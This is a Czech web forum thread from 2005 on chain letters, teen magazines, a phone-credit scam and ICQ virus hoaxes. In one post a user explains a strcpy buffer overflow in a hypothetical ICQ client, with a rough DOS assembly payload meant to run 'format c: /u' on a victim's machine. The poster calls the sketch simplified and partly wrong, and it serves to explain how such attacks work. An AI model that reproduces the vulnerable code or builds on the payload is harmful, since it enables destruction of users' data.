| Zobrazit předchozí téma :: Zobrazit následující téma |
| Autor |
Zpráva |
Ursus Titán

Založen: 22. 04. 2004 Příspěvky: 1560 Bydliště: Na tomto světě už nebydlí
|
Zaslal: pá leden 07, 2005 6:32 pm Předmět: |
|
|
Jo ty časopisy to jsou někdy klenoty. Stylistika údesná a obsah na zvracení...
Nejvíc se mi líbí, jak to ale všechny (a někdy skutečně i všichni) čtou.
Ségra (10 let) tady má jedno číslo (kvůli Sámerovi), tak jsem měl tu čest nahlédnout, zabylo mi blbě. Dorazil mě článek popisující první sexuální zážitek nějaké šesnáctky se sedmnáctiletým klukem. Jestli tohle psali oni tak nevím . _________________ Spoléhat na druhé je vždy ponižující, ale nemít nikoho, na něhož byste se mohli spolehnout, je ještě horší.
John Wyndham - Den trifidů |
|
| Návrat nahoru |
|
 |
Alexandr Liche

Založen: 13. 09. 2004 Příspěvky: 515 Bydliště: Někde v České Republice
|
Zaslal: pá leden 07, 2005 8:55 pm Předmět: |
|
|
TO DIX: Dixi, prosím tě, já to psal ve spěchu
TO All: No, moje sestra si to kupovala, ale už si je nekupuje z důvodem "píšou tam jen kraviny"  _________________ Ten, jehož jméno už nikdo nezná. |
|
| Návrat nahoru |
|
 |
Leny-m Moloch
|
Zaslal: pá leden 07, 2005 8:57 pm Předmět: Re: sapm |
|
|
| Mokusvin Limel napsal: |
Ja když vidím neco takoveho tak jsem tak línej čist to, že to mažu a nazdar, stejne tak jako seznamovací emaily typu:
moc te chci poznat, ale jiz mnohokráte jsem se spálila pošli mí dobíjecí číslo kuponu a já ti obratem zavolam. Pisi to větsinou chlapy a to je fakt humač. BTW nikdy žadna nezavolala. |
Neříkej, že jsi kredit už někomu poslal?  _________________ Leny-m |
|
| Návrat nahoru |
|
 |
Valalaldur Mirror Spider

Založen: 02. 10. 2004 Příspěvky: 475 Bydliště: Zakladni Materialni Sfera
|
Zaslal: pá leden 07, 2005 9:06 pm Předmět: |
|
|
| Wolf napsal: |
| Hehe a víte co mě štve úplně nejvíc? Takových 80% těhle hrozných blbostí šíří holky. Jen se podívejte do těch jejich časopisů, k čemu je tam naváděj... |
Nastesti ne vsechny holky ctou takovy ptakoviny
Dost mozna je to tim ze sis mailoval jen s holkama )
(nekdo se jich zastat musi)  _________________ Valalaldur V.,,Ospalý Člen Spolku,,
"Braid her branches, life fulfilling
Goddess loving, Goddess killing." |
|
| Návrat nahoru |
|
 |
Alexandr Liche

Založen: 13. 09. 2004 Příspěvky: 515 Bydliště: Někde v České Republice
|
Zaslal: pá leden 07, 2005 10:02 pm Předmět: |
|
|
To Valalaldur: No jo, někdo ano  _________________ Ten, jehož jméno už nikdo nezná. |
|
| Návrat nahoru |
|
 |
Mokusvin Limel Harpy

|
Zaslal: so leden 08, 2005 12:20 am Předmět: kredit |
|
|
Ano poslal asi 3x, ty 400kč nebyl problém a chtěl jsem se přesvědčit o smyšlenosti. A dokonce jsem to i videl v kavarne jak se 2 chlapci bavili kolik dnes dostaly asi meilu s kreditama.. _________________ Me jméno Mokusvin Limel jest, povolaním wampir.
Své sny k Tvým nohám pokládám, proto našlapuj zlehka, neboť šlapeš po mých snech.. |
|
| Návrat nahoru |
|
 |
Wolf Despise Mage

|
Zaslal: so leden 08, 2005 12:24 am Předmět: |
|
|
Hehe tak až mi zas dojde kredit, zkusím to . Dělám si srandu...
A ten "virus" na ICQ (už zas nevím jeho jméno) mě štve o to víc že se mi právě povedlo kompletně a neuvěřitelně dokonale zavirovat svůj počítač.
Já si tu jak blb už několik hodit marně odstraňuju viry, červy a trojský koně a lidi si zatím po ICQ píšou že se nám šíří nějakej další smyšlenej virus o kterém prd ví. Asi si půjdu založit další ACC na icq se jménem toho viru a požádám o autorizaci k zařazení do contactlistu celej svět  _________________ podepsán:
Wolf (paladin, Člen Spolku a bývalý Pán rekrutů)
IN VINO VERITAS - VE VÍNĚ JE PRAVDA |
|
| Návrat nahoru |
|
 |
Leny-m Moloch
|
Zaslal: so leden 08, 2005 12:47 am Předmět: |
|
|
Hehe tak až mi zas dojde kredit, zkusím to . Dělám si srandu...
A ten "virus" na ICQ (už zas nevím jeho jméno) mě štve o to víc že se mi právě povedlo kompletně a neuvěřitelně dokonale zavirovat svůj počítač.
Já si tu jak blb už několik hodit marně odstraňuju viry, červy a trojský koně a lidi si zatím po ICQ píšou že se nám šíří nějakej další smyšlenej virus o kterém prd ví. Asi si půjdu založit další ACC na icq se jménem toho viru a požádám o autorizaci k zařazení do contactlistu celej svět  |
S virama jsem taky zkusil... a ještě určitě zkusím, ale dokud se počítač dá zapnout, když spadne, je to dobrý  _________________ Leny-m |
|
| Návrat nahoru |
|
 |
Baltik Obyčejný Havran
|
Zaslal: so leden 08, 2005 5:49 am Předmět: |
|
|
| Gate keeper napsal: |
Jedine, co by mohlo fungovat, ze by se pres ICQ posilal nejaky plugin... a to neocekavam ze byste ho prijali a nainstalovali od neznameho cloveka  |
No ono to neni tak jednoduche, jestli se vyznas trochu v programovani, zkus se zamyslet nad takovouhle funkci:
| kód: |
char *doHtmlTag(char *tag)
{
char buffer[256],*p;
if (NULL == (p=strchr(tag, '>'))) return NULL;
*p++=0;
strcpy(buffer, tag+1);
switch (tolower(tag[1])) {
case 'a': htmlATag(buffer);
break;
case 'b': htmlBTag(buffer);
break;
default: /* neznamy tag ignorujeme */
}
return p;
}
|
Hezke, neni-liz pravda. lec exploit je trivialni, posles zpravu co vypada asi tak nasledovne (je potreba malinko hrani s debuggerem, tohle by chodilo plus minus v DOSu kde jeste trochu znam z pameti volaci konvence...)
| kód: |
zprava: db '<'
prikaz: db 'format c: /u'
nula db 'a'
shellcode: xor eax,eax
mov byte ptr cs:[nula], al
mov ah,4ch
int 21h
vata: db 233 DUP 96 ; dorovnani na delku 256 bytes (buffer)
promenna_p: db 4 dup 96 ; cokoli 4 bytes, tim se prepise promenna p
stack_return: dd offset_kde_je_ulozen_v_bufferu_shellcode
db '>' ; bez ukoncovaciho tagu to nefunguje
|
v debuggeru si akorat musis najit kde je realne v pameti nula a kde se uklada buffer, podminka je ze kod nesmi obsahovat nulu (konec stringu) ani znak '>' (tim by se to ukoncilo a buffer by nepretekl), ale to je drobnost a obejit to jde snadno.
Tuhle zpravu posles svemu "kamaradovi" ktery ma takhle spatne napsany icq klient (a podobnych bot bylo a je v ICQ miliony, odborne se jim rika Buffer Overflow) no a on nemusi udelat vubec nic a pusti se mu program format.
(je to hodne zjednodusene, s DOSem jsem delal naposled pred 10 lety tak nerikejte ze 4c je openfile a ne execfile  |
|
| Návrat nahoru |
|
 |
Baltik Obyčejný Havran
|
Zaslal: so leden 08, 2005 5:58 am Předmět: |
|
|
A zpátky k tématu. Jestli mi někdo z vás pošle někdy takovejdle řetězovej dopis, budu si myslet že je totální blbec. Ignorovat takových dopisů třeba 10
|
Sedim v praci, cekam az se domigruje 20 giga mailu z jednoho serveru na druhy a neskutecne se u toho nudim, ba co rict usinam, a proto abych zabil cas, pisu na ruzna fora.
Proto mi rychle odepis, abych mel co delaj, jinak budu velice nastvany, Kdyz mi neodepises, tak je chytim, hodim do basy, killnu te, zabiju ti kone, tvoji banku naskladam na zem pred HB Brit, smazu ti account, bloknu IP a vubec ti udelam to nejhorsi co umim.
Ali.Landry, nestastny to chlapec z rozvracene rodiny to v Tisnove, mi psal kdyz psat nemel, a nepsal kdyz psat mel. A jak dopadl? Prisel o nejeden account, z Tisnova si uz nezahraje a staci aby se na chvili ukazal a nikdo ho nema rad.
Proto pokud mi chces udelat radost, probud 5 svych kamaradek, posli jim tento dopis a pritahni je na forum, abych mel s kym kecat.
 |
|
| Návrat nahoru |
|
 |
|
|
Nemůžete odesílat nové téma do tohoto fóra Nemůžete odpovídat na témata v tomto fóru Nemůžete upravovat své příspěvky v tomto fóru Nemůžete mazat své příspěvky v tomto fóru Nemůžete hlasovat v tomto fóru
|
|